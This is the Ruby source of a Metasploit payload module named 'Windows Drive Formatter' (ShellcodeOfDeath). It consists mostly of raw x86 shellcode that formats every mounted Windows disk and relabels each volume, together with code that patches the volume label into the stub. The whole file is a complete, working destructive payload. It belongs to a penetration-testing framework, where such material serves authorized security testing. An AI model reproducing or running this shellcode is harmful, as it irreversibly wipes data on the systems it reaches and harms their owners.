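##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
# Shellcode Of Death
#
# Test bed:
# x86: Windows XP SP3, Windows 2003 SP2, Windows 7
# x64: Windows 8.1
#
###

module MetasploitModule

  CachedSize = 393

  Rank = ManualRanking

  include Msf::Payload::Windows
  include Msf::Payload::Single

  # Fixed part of the displacement patched into the stub: the UTF-16LE
  # "\\.\C:\" (16 bytes) and "NTFS" (10 bytes) strings that precede the
  # label, plus the label's own 2-byte NUL terminator. The patched byte is
  # `encoded label length + this value`.
  LABEL_DISPLACEMENT_BASE = 28

  # Longest ASCII label for which the displacement still fits the single
  # byte the stub reserves for it (each ASCII char widens to 2 bytes).
  MAX_VOLUME_LABEL_LENGTH = (0xff - LABEL_DISPLACEMENT_BASE) / 2

  # Registers module metadata and the VOLUMELABEL option.
  #
  # @param info [Hash] module info, merged by the framework's update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Windows Drive Formatter',
      'Description'   => %q{
        This payload formats all mounted disks in Windows (aka ShellcodeOfDeath).

        After formatting, this payload sets the volume label to the string specified in
        the VOLUMELABEL option. If the code is unable to access a drive for any reason,
        it skips the drive and proceeds to the next volume.
      },
      'Author'        => [
        'Ashfaq Ansari <ashfaq_ansari1989[at]hotmail.com>',
        'Ruei-Min Jiang <mike820324[at]gmail.com>'
      ],
      'License'       => MSF_LICENSE,
      'References'    =>
        [
          [ 'URL', 'http://hacksys.vfreaks.com/research/shellcode-of-death.html' ],
          [ 'URL', 'https://github.com/hacksysteam/ShellcodeOfDeath' ],
        ],
      'Platform'      => 'win',
      'Arch'          => ARCH_X86,
      'Privileged'    => true,
      'Notes'         => {'AKA' => ['ShellcodeOfDeath']}
    ))

    # EXITFUNC is not supported
    deregister_options('EXITFUNC')

    # The only tunable: the label written to each volume after formatting.
    register_options(
      [
        OptString.new('VOLUMELABEL', [ false, "Set the volume label", "PwNeD" ])
      ])
  end

  # Assembles the stub, patching in the volume label and the one-byte
  # displacement the stub uses to reach the routine placed after the label.
  #
  # @param _opts [Hash] unused; kept for the Msf::Payload::Single interface
  # @return [String] the raw x86 stub as a binary (ASCII-8BIT) string
  # @raise [ArgumentError] if VOLUMELABEL is too long for the one-byte displacement
  def generate(_opts = {})
    volume_label = datastore['VOLUMELABEL'] || ""

    # The stub reads the label as UTF-16LE. Widening byte by byte is only
    # correct for ASCII labels; non-ASCII input is mangled rather than
    # transcoded. Kept as-is to match the fixed UTF-16LE strings in stub_mid.
    encoded_volume_label = volume_label.to_s.unpack("C*").pack("v*")

    # Displacement from the stub's data pointer (presumably ESI, given the
    # lea eax,[esi+disp32] it is patched into) to the routine after the label.
    magic_key = encoded_volume_label.length + LABEL_DISPLACEMENT_BASE

    # pack("C") silently reduces values above 0xff modulo 256, which would
    # emit a stub whose displacement points somewhere else entirely; refuse
    # the label instead of generating a corrupt stub.
    if magic_key > 0xff
      raise ArgumentError,
            "VOLUMELABEL is too long (#{volume_label.to_s.length} chars); " \
            "at most #{MAX_VOLUME_LABEL_LENGTH} ASCII characters fit the one-byte displacement"
    end

    # Position-independent x86 stub. The ASCII "fmifs.dll" string is embedded
    # in the fourth-from-last row; the final two bytes (\x8d\x86) are
    # lea eax,[esi+disp32], whose disp32 is completed by magic_key and the
    # three zero bytes that open stub_mid.
    stub_head =
      "\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83" \
      "\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c" \
      "\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b" \
      "\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83" \
      "\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b" \
      "\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4" \
      "\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33" \
      "\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89" \
      "\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8" \
      "\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf" \
      "\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83" \
      "\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d" \
      "\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff\xd3\x8d\x86"

    # Remainder of the code, then the UTF-16LE "\\.\C:\" and "NTFS" strings
    # (the last two rows) that sit immediately before the label.
    stub_mid =
      "\x00\x00\x00\x50\x68\x00\x10\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50\x8d\x86\x10\x00" \
      "\x00\x00\x50\x6a\x0c\x8d\x46\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00\x00\x8b\x5d\x04" \
      "\xff\xd3\x89\xf9\x83\x46\x08\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8\x7d\xff\xff\xff" \
      "\x5c\x00\x5c\x00\x2e\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00\x54\x00\x46\x00" \
      "\x53\x00\x00\x00"

    # The label's UTF-16LE NUL terminator followed by the routine magic_key
    # points at: push ebp; mov ebp,esp; xor eax,eax; inc eax; pop ebp; ret 0xc.
    stub_tail = "\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00"

    # Join everything as binary. The literals carry the source file's
    # encoding, and the packed pieces are ASCII-8BIT; once a packed byte is
    # >= 0x80 (a displacement of 0x80 or more) mixing the two could raise
    # Encoding::CompatibilityError, so normalise first.
    stub_head.b + [magic_key].pack("C") + stub_mid.b + encoded_volume_label + stub_tail.b
  end
end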